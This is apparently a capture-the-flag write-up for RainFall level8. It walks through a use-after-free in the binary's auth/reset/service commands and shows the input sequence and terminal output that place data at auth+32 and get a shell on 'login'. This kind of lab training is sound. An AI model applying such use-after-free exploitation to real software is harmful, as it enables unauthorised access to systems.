We can exploit heap, use-after-free

Let's auth as an user

auth user
0x804a008, (nil)

Then we call reset
reset
0x804a008, (nil)

We can see that our address still exist because it was not set as 0, if we call
service it will have the same addresse as auth

service AAA
0x804a008, 0x804a008

Now to pass login, we need to add an value at 0x804a008 + 32, service do this

auth login
reset
service A 0x804a008 => 0 - 16
service B           => 16 - 32
service C           => 32 - 48

0x804a008 + 32 should now be equal to something..

level8@RainFall:~$ ./level8
(nil), (nil)
auth login
0x804a008, (nil)
reset
0x804a008, (nil)
service A
0x804a008, 0x804a008
service B
0x804a008, 0x804a018
service C
0x804a008, 0x804a028
login
$
